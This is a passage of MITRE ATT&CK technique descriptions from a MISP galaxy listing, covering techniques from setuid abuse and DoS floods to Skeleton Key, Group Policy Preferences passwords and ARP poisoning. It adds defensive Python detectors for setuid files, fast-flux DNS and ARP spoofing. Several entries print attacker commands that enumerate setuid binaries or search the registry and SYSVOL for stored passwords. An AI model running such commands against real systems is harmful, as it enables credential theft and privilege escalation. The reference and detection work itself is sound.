Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.

Adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.

Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setgid bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm -4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm -2000 2>/dev/null</code> may be used for setgid (the older <code>-perm +4000</code> spelling still works with BSD and macOS <code>find</code>, but GNU findutils no longer accepts it; <code>-perm /6000</code> matches files with either bit). Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)
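The same enumeration is the defender's inventory, and the useful signal is the delta from a known baseline rather than the raw list, since a stock system carries a few dozen legitimate setuid binaries. The following added example (written for this page; not code from ATT&CK, MISP or GTFOBins) walks a tree with <code>lstat</code>, reports setuid/setgid regular files, marks names that also appear on the GTFOBins SUID list, and diffs against a baseline. The temporary tree it builds and the short watchlist are constructed for the example.

```python
import os
import stat
import tempfile

# Added example: inventory setuid/setgid files and report what is new against a baseline.
# Watchlist is a short subset of names from the GTFOBins SUID list (assumption for this example).
GTFOBINS_SUID = {"bash", "cp", "env", "find", "less", "nmap", "python3", "vim"}


def find_setid(root):
    """Walk root without following symlinks; return regular files with setuid or setgid set."""
    hits = []
    for dirpath, _, filenames in os.walk(root):          # followlinks defaults to False
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)                        # lstat: never follow a planted symlink
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            setuid = bool(st.st_mode & stat.S_ISUID)
            setgid = bool(st.st_mode & stat.S_ISGID)
            if setuid or setgid:
                hits.append({"path": path, "name": name, "setuid": setuid, "setgid": setgid,
                             "owner_uid": st.st_uid, "mode": oct(stat.S_IMODE(st.st_mode)),
                             "gtfobins": name in GTFOBINS_SUID})
    return hits


def new_since(baseline_paths, hits):
    """Setuid/setgid files that were not in a previously recorded baseline."""
    return [h for h in hits if h["path"] not in baseline_paths]


def demo():
    """Constructed tree: a copied 'find' with setuid (chmod 4755), a setgid helper and a
    plain script. Returns (all hits, hits not in the baseline)."""
    with tempfile.TemporaryDirectory() as root:
        specs = {"find": 0o4755, "backup-helper": 0o2755, "plain": 0o755}
        for name, mode in specs.items():
            path = os.path.join(root, name)
            with open(path, "wb") as fh:
                fh.write(b"#!/bin/sh\n")
            os.chmod(path, mode)                           # chmod after the write: writing clears the bits
        hits = find_setid(root)
        baseline = {os.path.join(root, "backup-helper")}   # the helper was already known
        return hits, new_since(baseline, hits)


if __name__ == "__main__":
    hits, fresh = demo()
    for h in hits:
        flag = " (on GTFOBins)" if h["gtfobins"] else ""
        print(f"{h['mode']} uid={h['owner_uid']} {h['path']}{flag}")
    print("new since baseline:", [h["path"] for h in fresh])
```

Record the baseline from a freshly installed host of the same image and re-run after patching, since package updates legitimately add or remove setuid files; anything else that appears, and in particular a copy of a GTFOBins-listed binary outside the usual system directories, is the "own malware" case described above.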

The tag is: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001"

Table 5720. Table References

Links

http://man7.org/linux/man-pages/man2/setuid.2.html

https://attack.mitre.org/techniques/T1548/001

https://gtfobins.github.io/+suid

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Direct Network Flood - T1498.001

Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service’s network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.

Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Direct Network Flood - T1498.001"

Table 5721. Table References

Links

https://attack.mitre.org/techniques/T1498/001

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged

OS Exhaustion Flood - T1499.001

Adversaries may launch a denial of service (DoS) attack targeting an endpoint’s operating system (OS). A system’s OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets is sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)

The tag is: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001"

Table 5722. Table References

Links

https://attack.mitre.org/techniques/T1499/001

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/

https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html

Domain Controller Authentication - T1556.001

Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001"

Table 5723. Table References

Links

https://attack.mitre.org/techniques/T1556/001

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://www.secureworks.com/research/skeleton-key-malware-analysis

Stored Data Manipulation - T1565.001

Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001"

Table 5724. Table References

Links

https://attack.mitre.org/techniques/T1565/001

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Social Media Accounts - T1585.001

Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001"

Table 5725. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1585/001

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Scanning IP Blocks - T1595.001

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Scanning IP Blocks - T1595.001"

Table 5726. Table References

Links

https://attack.mitre.org/techniques/T1595/001

https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf

Component Object Model - T1559.001

Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001"

Table 5727. Table References

Links

https://attack.mitre.org/techniques/T1559/001

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Social Media Accounts - T1586.001

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1586.001"

Table 5728. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1586/001

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Fast Flux DNS - T1568.001

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)

The simplest, "single-flux" method, involves registering and de-registering an address as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.
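The single-flux and double-flux signals described above, turned into a triage heuristic over passive-DNS style observations. This is an added example, not code from the galaxy or ATT&CK; the observations and the thresholds (TTL, address and network counts) are constructed for illustration, and the double-flux check simply looks for the NS answer set changing between lookups.

```python
from collections import defaultdict

# Constructed passive-DNS style observations for illustration (not real data):
# (lookup_time_seconds, qname, rtype, rdata, ttl)
OBSERVATIONS = [
    (0,    "flux.example",   "A",  "198.51.100.10",    300),
    (0,    "flux.example",   "A",  "203.0.113.7",      300),
    (300,  "flux.example",   "A",  "192.0.2.44",       300),
    (300,  "flux.example",   "A",  "198.51.100.88",    300),
    (600,  "flux.example",   "A",  "203.0.113.120",    300),
    (600,  "flux.example",   "NS", "ns1.flux.example", 300),
    (900,  "flux.example",   "NS", "ns2.flux.example", 300),
    (0,    "static.example", "A",  "192.0.2.1",        86400),
    (3600, "static.example", "A",  "192.0.2.1",        86400),
]


def summarize(observations):
    """Group observations per name: distinct A records, every TTL seen, and
    the NS set returned by each lookup."""
    per = defaultdict(lambda: {"a": set(), "ttls": [], "ns_by_lookup": defaultdict(set)})
    for t, name, rtype, rdata, ttl in observations:
        rec = per[name]
        rec["ttls"].append(ttl)
        if rtype == "A":
            rec["a"].add(rdata)
        elif rtype == "NS":
            rec["ns_by_lookup"][t].add(rdata)
    return per


def classify(rec, ttl_threshold=600, min_addresses=4, min_networks=3):
    """Label one name as 'none', 'single-flux' or 'double-flux'.

    single-flux: short TTLs plus many A records spread over several networks
                 (a /24 prefix is used as a crude 'different network' test);
    double-flux: single-flux plus NS answers that change between lookups.
    Short TTLs and many addresses are also normal for CDNs, so treat the label
    as a triage signal to combine with reputation and traffic context."""
    low_ttl = max(rec["ttls"]) <= ttl_threshold
    networks = {ip.rsplit(".", 1)[0] for ip in rec["a"]}
    single = low_ttl and len(rec["a"]) >= min_addresses and len(networks) >= min_networks
    ns_sets = {frozenset(s) for s in rec["ns_by_lookup"].values()}
    ns_rotates = len(ns_sets) > 1
    double = single and ns_rotates
    label = "double-flux" if double else "single-flux" if single else "none"
    return {"low_ttl": low_ttl, "addresses": len(rec["a"]), "networks": len(networks),
            "ns_rotates": ns_rotates, "label": label}


def flag_domains(observations):
    """Map every observed name to its fast-flux label."""
    return {name: classify(rec)["label"] for name, rec in summarize(observations).items()}


if __name__ == "__main__":
    for name, label in flag_domains(OBSERVATIONS).items():
        print(f"{name:20} {label}")
```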

The tag is: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001"

Table 5729. Table References

Links

https://attack.mitre.org/techniques/T1568/001

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref

https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/

Threat Intel Vendors - T1597.001

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)

Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Threat Intel Vendors - T1597.001"

Table 5730. Table References

Links

https://attack.mitre.org/techniques/T1597/001

https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/

Credentials in Registry - T1552.002

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

  • Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>

  • Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"

Table 5731. Table References

Links

https://attack.mitre.org/techniques/T1552/002

https://pentestlab.blog/2017/04/19/stored-credentials/

Domain Trust Modification - T1484.002

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002"

Table 5732. Table References

Links

https://attack.mitre.org/techniques/T1484/002

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed

https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml

https://o365blog.com/post/federation-vulnerability/

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://www.sygnia.co/golden-saml-advisory

Service Exhaustion Flood - T1499.002

Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services; however, others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)

Another variation, known as an SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes an SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Service Exhaustion Flood - T1499.002"

Table 5733. Table References

Links

https://attack.mitre.org/techniques/T1499/002

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/

https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new

Password Filter DLL - T1556.002

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002"

Table 5734. Table References

Links

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

https://attack.mitre.org/techniques/T1556/002

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Transmitted Data Manipulation - T1565.002

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002"

Table 5735. Table References

Links

https://attack.mitre.org/techniques/T1565/002

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Group Policy Preferences - T1552.006

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)

These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

  • Metasploit’s post exploitation module: <code>post/windows/gather/credentials/gpp</code>

  • Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)

  • gpprefdecrypt.py

On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s *.xml</code>

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006"

Table 5736. Table References

Links

https://adsecurity.org/?p=2288

https://attack.mitre.org/techniques/T1552/006

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)

https://msdn.microsoft.com/library/cc422924.aspx

https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html

ARP Cache Poisoning - T1557.002

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use and store that information in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)

Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
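The three behaviours described above (a spoofed reply racing the real owner, a gratuitous reply, and the resulting IP-to-MAC conflict) as seen from a monitoring point, in the style of an arpwatch-like detector. This is an added example, not code from the galaxy or ATT&CK; the ARP events, addresses and the rogue MAC are constructed for illustration.

```python
from collections import defaultdict

# Constructed ARP events for illustration: (time_s, opcode, sender_ip, sender_mac, target_ip).
# 192.168.1.1 plays the gateway; de:ad:be:ef:00:99 is a constructed rogue host.
EVENTS = [
    (1.0, "request", "192.168.1.10", "aa:aa:aa:aa:aa:10", "192.168.1.1"),
    (1.1, "reply",   "192.168.1.1",  "aa:aa:aa:aa:aa:01", "192.168.1.10"),  # legitimate gateway answer
    (5.0, "request", "192.168.1.11", "aa:aa:aa:aa:aa:11", "192.168.1.1"),
    (5.0, "reply",   "192.168.1.1",  "de:ad:be:ef:00:99", "192.168.1.11"),  # answers before the real owner
    (5.2, "reply",   "192.168.1.1",  "aa:aa:aa:aa:aa:01", "192.168.1.11"),
    (9.0, "reply",   "192.168.1.1",  "de:ad:be:ef:00:99", "192.168.1.1"),   # gratuitous: target IP == sender IP
]


def analyze(events, request_window=2.0):
    """Return a list of (time, kind, ip, detail) alerts.

    kinds: ip-mac-conflict   an IP was answered with a MAC other than the one first learned
           unsolicited-reply a reply with no matching request within `request_window` seconds
           gratuitous-reply  sender and target IP are equal (an announcement to the segment)
    Gratuitous ARP is also used legitimately (boot-time announcements, failover),
    so it is most meaningful when it coincides with an ip-mac-conflict."""
    alerts = []
    learned = {}                    # ip -> first MAC seen claiming it
    requests = defaultdict(list)    # requested ip -> times of requests
    for t, op, sip, smac, tip in sorted(events, key=lambda e: e[0]):  # stable: keeps request before reply
        if op == "request":
            requests[tip].append(t)
            continue
        if sip == tip:
            alerts.append((t, "gratuitous-reply", sip, smac))
        elif not any(0 <= t - r <= request_window for r in requests[sip]):
            alerts.append((t, "unsolicited-reply", sip, smac))
        first = learned.setdefault(sip, smac)
        if first != smac:
            alerts.append((t, "ip-mac-conflict", sip, f"{first} -> {smac}"))
    return alerts


def conflicting_macs(alerts):
    """MACs that showed up on the new side of an ip-mac-conflict, for triage."""
    return sorted({a[3].split(" -> ")[1] for a in alerts if a[1] == "ip-mac-conflict"})


if __name__ == "__main__":
    found = analyze(EVENTS)
    for t, kind, ip, detail in found:
        print(f"t={t:<5} {kind:<18} {ip:<14} {detail}")
    print("MACs to investigate:", conflicting_macs(found))
```

On a real capture, seed `learned` from DHCP leases or an asset inventory rather than trusting the first reply seen, since that first reply may itself be the spoofed one.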

The tag is: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002"

Table 5737. Table References

Links

https://attack.mitre.org/techniques/T1557/002

https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411

https://tools.ietf.org/html/rfc826

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Dynamic Data Exchange - T1559.002

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

